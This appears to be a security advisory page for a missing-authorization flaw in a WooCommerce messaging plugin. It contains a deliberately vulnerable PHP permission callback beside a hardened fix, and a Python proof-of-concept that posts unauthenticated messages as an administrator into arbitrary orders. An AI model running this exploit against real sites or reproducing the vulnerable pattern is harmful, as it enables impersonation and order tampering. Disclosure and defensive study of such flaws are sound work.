Security Vulnerability Report
CVE-2025-13452 CVSS 4.3 MEDIUM

Published: 2025-11-25 08:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 14. This is due to a flawed permission check in the REST API permission callback that returns true when no nonce is provided. This makes it possible for unauthenticated attackers to impersonate any WordPress user and inject arbitrary messages into any WooCommerce order conversation by directly calling the REST endpoint with controlled user_id, order_id, and context parameters.
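The flaw class in the description, shown as an added illustrative example in PHP. This is not the OrderConvo plugin's code (the plugin's real route registration lives in includes/wprest.class.php, linked in the references); the route namespace orderconvo/v1, the function names and the parameter names are assumptions. The first pair of functions reproduces the described bug pattern: a permission callback that passes when no nonce is sent, feeding a handler that trusts a client-supplied user_id. The second pair shows the fix: let WordPress core's cookie/nonce handling establish the current user, refuse anonymous callers, take the acting user from the session rather than from the request body, and confirm the caller owns or may manage the target order.

```php
<?php
// Added illustrative example, not the OrderConvo plugin's code.
// Route namespace, function names and parameter names are assumptions.

// VULNERABLE pattern (as described in the advisory): a permission callback that
// treats a missing nonce as "nothing to verify" and returns true. Combined with
// a handler that trusts a client-supplied user_id, any anonymous caller can post
// as any user into any order.
function orderconvo_example_vulnerable_permission( WP_REST_Request $request ) {
    $nonce = $request->get_header( 'X-WP-Nonce' );
    if ( empty( $nonce ) ) {
        return true; // BUG: absence of a nonce must never grant access
    }
    return false !== wp_verify_nonce( $nonce, 'wp_rest' );
}

function orderconvo_example_vulnerable_handler( WP_REST_Request $request ) {
    $user_id  = absint( $request->get_param( 'user_id' ) );  // BUG: attacker-controlled identity
    $order_id = absint( $request->get_param( 'order_id' ) ); // BUG: no ownership check
    // ... store the message under $user_id / $order_id ...
    return rest_ensure_response( array( 'stored' => true ) );
}

// HARDENED pattern. WordPress core already validates X-WP-Nonce for cookie
// sessions before the permission callback runs (rest_cookie_check_errors);
// a request with no nonce is simply treated as user 0. So the callback must
// ask "who is the current user, and may they touch this order", never
// "was a nonce present".
function orderconvo_example_secure_permission( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_forbidden', 'Authentication required.', array( 'status' => 401 ) );
    }

    $order = wc_get_order( absint( $request->get_param( 'order_id' ) ) );
    if ( ! $order ) {
        return new WP_Error( 'rest_not_found', 'Unknown order.', array( 'status' => 404 ) );
    }

    // Shop staff may message on any order; customers only on their own.
    if ( current_user_can( 'manage_woocommerce' ) ) {
        return true;
    }
    if ( (int) $order->get_customer_id() === get_current_user_id() ) {
        return true;
    }
    return new WP_Error( 'rest_forbidden', 'You may not post to this order.', array( 'status' => 403 ) );
}

function orderconvo_example_secure_handler( WP_REST_Request $request ) {
    // Identity comes from the authenticated session, never from the request body.
    $user_id  = get_current_user_id();
    $order_id = absint( $request->get_param( 'order_id' ) );
    $message  = sanitize_textarea_field( (string) $request->get_param( 'message' ) );
    // ... store $message under $user_id / $order_id ...
    return rest_ensure_response( array( 'stored' => true, 'user_id' => $user_id ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'orderconvo/v1', '/messages', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'orderconvo_example_secure_handler',
        'permission_callback' => 'orderconvo_example_secure_permission',
        'args'                => array(
            'order_id' => array( 'required' => true, 'type' => 'integer' ),
            'message'  => array( 'required' => true, 'type' => 'string' ),
            // Deliberately no user_id argument: the server decides who is posting.
        ),
    ) );
} );
```

The two points worth carrying into any review of a WordPress REST route are that a permission_callback is an authorization decision, not a nonce check (core does the nonce work and leaves a nonce-less request as user 0), and that the identity and the object being acted on must both be resolved server-side against the session, which is exactly what CWE-639 (user-controlled key) is about.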

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Note: the vector scores Privileges Required as Low (PR:L), while the description states that the endpoint is reachable by unauthenticated attackers. If the permission callback really does return true with no nonce, the same vector with PR:N scores 5.3, so treat 4.3 as a floor when triaging.

Configurations (Affected Products)

NVD publishes no CPE configuration data for this entry (vulnStatus: Deferred), so CPE-based matching will not flag it. Affected product, from the advisory text:

OrderConvo (Admin and Customer Messages After Order for WooCommerce) <= 14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-13452 PoC - Unauthenticated Message Injection
# Target: WordPress site with OrderConvo plugin <= 14
# Impact: Allows unauthenticated attackers to inject messages into any WooCommerce order

TARGET_URL = "https://vulnerable-site.com"

# Route path as used by this PoC. The advisory text does not name the route;
# confirm it against the plugin's route registration in includes/wprest.class.php
# (referenced lines 56 and 113) before relying on it.
MESSAGES_ENDPOINT = f"{TARGET_URL}/wp-json/orderconvo/v1/messages"


def exploit_message_injection():
    """
    Exploit the missing authorization vulnerability in the OrderConvo plugin.
    Demonstrates how an unauthenticated attacker can inject an arbitrary
    message into any WooCommerce order conversation.
    """
    # Attacker-controlled user_id, order_id and context, as described in the advisory
    payload = {
        "user_id": 1,            # Impersonate the first administrator account
        "order_id": 123,         # Any WooCommerce order ID
        "context": "customer",   # "customer" or "admin"
        "message": "This is a test message injected by the PoC",
    }
    # No X-WP-Nonce header at all: the flawed permission callback returns true
    # when no nonce is provided, so the request is accepted without a session.
    headers = {"Content-Type": "application/json"}

    print(f"[*] Targeting: {TARGET_URL}")
    print(f"[*] Exploiting endpoint: {MESSAGES_ENDPOINT}")
    print(f"[*] Injecting message as user_id={payload['user_id']} into order_id={payload['order_id']}")
    try:
        response = requests.post(MESSAGES_ENDPOINT, json=payload, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    if response.status_code in (200, 201):
        print("[+] SUCCESS: message injection completed")
        print(f"[+] Response: {response.text}")
        return True
    print(f"[-] Failed with status code: {response.status_code}")
    print(f"[-] Response: {response.text}")
    return False


def check_plugin_version():
    """
    Check whether a vulnerable plugin version is installed.
    Caveat: /wp-json/wp/v2/plugins requires an authenticated user with the
    activate_plugins capability, so an unauthenticated probe normally gets a
    401; this check only works when the session has valid credentials.
    """
    endpoint = f"{TARGET_URL}/wp-json/wp/v2/plugins?search=orderconvo"
    try:
        response = requests.get(endpoint, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Version check request failed: {e}")
        return None

    if response.status_code != 200:
        print(f"[*] Could not determine plugin version (HTTP {response.status_code})")
        return None

    for plugin in response.json():
        if "orderconvo" in plugin.get("name", "").lower():
            version = plugin.get("version", "unknown")
            print(f"[*] Found plugin version: {version}")
            try:
                # Compare numerically; a string comparison such as '9' <= '14'
                # is False and misorders versions.
                if float(version) <= 14:
                    print("[!] Plugin is VULNERABLE!")
            except ValueError:
                print("[*] Unrecognised version string")
            return version

    print("[*] Could not determine plugin version")
    return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-13452 - OrderConvo Unauthorized Message Injection")
    print("=" * 60)
    # First check the plugin version, then attempt exploitation
    check_plugin_version()
    exploit_message_injection()

References

Vulnerable code, tag 14 (permission callback and route registration):
https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L56
https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L113
Same file in trunk:
https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L56
https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L113
Fix changeset:
https://plugins.trac.wordpress.org/changeset/3439999/
Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/2c1dd87c-cc28-43b3-8378-4583dc6de195?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13452",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-25T08:15:51.740",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 14. This is due to a flawed permission check in the REST API permission callback that returns true when no nonce is provided. This makes it possible for unauthenticated attackers to impersonate any WordPress user and inject arbitrary messages into any WooCommerce order conversation by directly calling the REST endpoint with controlled user_id, order_id, and context parameters."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L113", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L56", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L113", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L56", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3439999/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c1dd87c-cc28-43b3-8378-4583dc6de195?source=cve", "source": "[email protected]"}
    ]
  }
}